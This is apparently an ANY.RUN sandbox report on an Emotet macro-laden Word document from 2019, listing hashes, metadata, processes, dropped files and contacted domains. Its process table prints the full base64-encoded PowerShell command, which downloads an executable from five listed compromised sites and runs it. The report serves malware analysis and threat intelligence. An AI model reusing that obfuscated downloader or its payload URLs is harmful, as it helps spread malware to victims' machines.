analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

bf948c6a7019bf94c1e1d624d3e2dfdcd2033645fb1a7898856199fe1c961e17

Full analysis: https://app.any.run/tasks/476181e7-125b-42a5-b69e-2ac20c61e0e4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 13:06:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Sports & Games, Subject: Cambridgeshire, Author: Pamela Romaguera, Keywords: Fantastic, Comments: Squares, Template: Normal.dotm, Last Saved By: Freeman Parker, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 07:39:00 2019, Last Saved Time/Date: Fri Oct 11 07:39:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0
MD5:

AAEEF0153572F9E3FA1CB229724CF922

SHA1:

CCC24980CFFA802F8122D75FB9BE959CE1290E4C

SHA256:

BF948C6A7019BF94C1E1D624D3E2DFDCD2033645FB1A7898856199FE1C961E17

SSDEEP:

3072:Xaa3bgB0eOY5CTsdAgUObYJ0m9zGAkbtO2lY2Go//6rGHsrw9sSJ6wKlutfMV:Xaa3bgBfb00dRx//MGHsrksSJ69q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3816)
    • Executed via WMI

      • powershell.exe (PID: 3816)
    • PowerShell script executed

      • powershell.exe (PID: 3816)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2340)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2340)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Runte
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 204
Paragraphs: 1
Lines: 1
Company: Mosciski - Wolff
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 175
Words: 30
Pages: 1
ModifyDate: 2019:10:11 06:39:00
CreateDate: 2019:10:11 06:39:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Freeman Parker
Template: Normal.dotm
Comments: Squares
Keywords: Fantastic
Author: Pamela Romaguera
Subject: Cambridgeshire
Title: Sports & Games
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2340"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bf948c6a7019bf94c1e1d624d3e2dfdcd2033645fb1a7898856199fe1c961e17.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3816powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADQAMABiADQAOQA4ADAANwA4ADAAMwAwAD0AJwB4ADcAMwBiADUAMwA1ADIAMAA0ADYAMQAnADsAJABjAGMAYgAzAHgAMgAxADYANwBiADYAMQAgAD0AIAAnADUAMwA5ACcAOwAkAHgANwA4ADAAMwB4AHgANAAxADgAMAAwAD0AJwBiADgAMwAwADAANAA1AGMAYwAwADUAYwAnADsAJABjADcANgAwADAAOQAwADQAMAA1ADcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAYwBiADMAeAAyADEANgA3AGIANgAxACsAJwAuAGUAeABlACcAOwAkAGMAMAA2AGIANQB4ADgAMQA5ADAAeAA2AGMAPQAnAGIANQA0ADAAMAA0ADAAMQAyADcAMAAnADsAJABiADQAMgAwADMAMAA2ADYAOAAxADUAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAYwBMAGkAZQBuAHQAOwAkAGMAMgAwADEANgAxAGMAOAA3ADEAMQA2AD0AJwBoAHQAdABwADoALwAvAHQAaABpAGoAcwBtAG8AcgBsAGkAbwBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBoADUAMgAwADcANwAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBnAGkAbwBpAGcAYQBzAC4AYwBvAG0ALwBMAG8AZwBpAG4ALwAxAGcAOQA4AC8AKgBoAHQAdABwADoALwAvAHkAeQA2ADIANgAyAC4AYwBvAG0ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAGgANgA3ADAALwAqAGgAdAB0AHAAOgAvAC8AdABoAGUAbgBlAHcAcwA0AHYAaQBlAHcAcwAuAGMAbwBtAC8AOQBtAGMAbQBuAHAAMwAvADIAaQAzADYALwAqAGgAdAB0AHAAOgAvAC8AcQB1AGUAZQBuAGkAZQBrAGEAdwBhAGIAZQAuAGMAbwBtAC8AYQBsAGwAXwBwAGgAbwB0AG8AcwAvADQAZQBsADcANQAvACcALgAiAHMAcABsAGAASQB0ACIAKAAnACoAJwApADsAJABiADAANQBjADAAYwA5ADMAYwAwADUANwAwAD0AJwBiADAANAAxADEAeAA5ADMAYgAxADEANQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4AHgAeABiADAANABiAGIAOAAzADMANQAwACAAaQBuACAAJABjADIAMAAxADYAMQBjADgANwAxADEANgApAHsAdAByAHkAewAkAGIANAAyADAAMwAwADYANgA4ADEANQAuACIAZABgAG8AVwBOAEwAbwBgAEEARABGAGAASQBsAEUAIgAoACQAeAB4AHgAYgAwADQAYgBiADgAMwAzADUAMAAsACAAJABjADcANgAwADAAOQAwADQAMAA1ADcAKQA7ACQAYgA3ADAAMAAwADAANQAwADgAeAA1AD0AJwBiADAAMwBjAHgAMAAwADQAMQA4ADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABjADcANgAwADAAOQAwADQAMAA1ADcAKQAuACIATABFAE4AYABHAHQAaAAiACAALQBnAGUAIAAzADUAOAA2ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQByAHQAIgAoACQAYwA3ADYAMAAwADkAMAA0ADAANQA3ACkAOwAkAGIAMAA5ADgAMAAwADAANAAwADcAMAA3AD0AJwB4ADAAYwAwADIANQAwADEAMABiADUAYgA5ACcAOwBiAHIAZQBhAGsAOwAkAGMAYwB4AHgANABiADAAMAA0ADgAeAA9ACcAYwA5ADEANAA5AHgAMwA1ADUAeAA2ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAeAA3AGMAOQB4AGMAYgAwADQAMAA2ADgAPQAnAGMAOQBiADEAYgA2ADEAMQAwAHgANAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 887
Read events
1 088
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2340WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA310.tmp.cvr
MD5:
SHA256:
3816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NUISS8BYT3V28G8MIUZX.temp
MD5:
SHA256:
2340WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\479EC528.wmfwmf
MD5:C05A6D1B58DCBDC99CE474C796955CF2
SHA256:BBA0E7A68F2510339998D1EDBEC5439FB6FBDA54016BAFA686C370397A18229B
2340WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F81F8C8A.wmfwmf
MD5:B3B267AF10567AA2F63E4B21CC73D29F
SHA256:25137D6CABCC378313E42D0F7271E131C117BA183259BF51CA78E122E80079BC
2340WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F22044F2.wmfwmf
MD5:8CF8BAF5D1B6A52D17BB7E527AE7916D
SHA256:CD2B6F60D4626D972A11857BAACA8903649EC4191E9A8B055BE1C30B51B68153
2340WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\431DE1D0.wmfwmf
MD5:834C79652706C8331818AA79077B2853
SHA256:49095F07E813FF26F29B6AD6DCB9A45707DD1D1BD37AF80253875712F2C4F210
2340WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC9A641C.wmfwmf
MD5:F9031FD21DA0F51C35FBE71607F5A358
SHA256:8692BDE0A063FDD08FB894EAE119C2C117E151A493EB3062D6EE99104A28E792
2340WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\217A385E.wmfwmf
MD5:EBD514E9108118A7EB4523A8A700B474
SHA256:8870C147A67425E86513DCBEE2A985B5C8BA26453A69E415FD28781E012DEECE
3816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39aee8.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2340WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$948c6a7019bf94c1e1d624d3e2dfdcd2033645fb1a7898856199fe1c961e17.docpgc
MD5:E901ADB6016B736098B7C0A0C6A30515
SHA256:25683758389B14134B507BE3A3149ED3B41FBB4FC5710EDE2A8C25FFA161EF44
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3816
powershell.exe
GET
404
185.87.187.138:80
http://thijsmorlion.com/wp-admin/h52077/
NL
xml
345 b
suspicious
3816
powershell.exe
GET
404
77.104.150.127:80
http://queeniekawabe.com/all_photos/4el75/
US
xml
345 b
whitelisted
3816
powershell.exe
GET
404
50.118.231.203:80
http://yy6262.com/wordpress/h670/
US
xml
345 b
whitelisted
3816
powershell.exe
GET
404
103.21.58.250:80
http://thenews4views.com/9mcmnp3/2i36/
IN
xml
345 b
suspicious
3816
powershell.exe
GET
404
103.95.197.8:80
http://thegioigas.com/Login/1g98/
VN
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3816
powershell.exe
103.95.197.8:80
thegioigas.com
VIET DIGITAL TECHNOLOGY LIABILITY COMPANY
VN
suspicious
3816
powershell.exe
50.118.231.203:80
yy6262.com
EGIHosting
US
suspicious
3816
powershell.exe
185.87.187.138:80
thijsmorlion.com
Astralus B.V.
NL
suspicious
3816
powershell.exe
103.21.58.250:80
thenews4views.com
PDR
IN
unknown
3816
powershell.exe
77.104.150.127:80
queeniekawabe.com
SoftLayer Technologies Inc.
US
unknown

DNS requests

Domain
IP
Reputation
thijsmorlion.com
  • 185.87.187.138
suspicious
thegioigas.com
  • 103.95.197.8
suspicious
yy6262.com
  • 50.118.231.203
whitelisted
thenews4views.com
  • 103.21.58.250
suspicious
queeniekawabe.com
  • 77.104.150.127
unknown

Threats

No threats detected
No debug info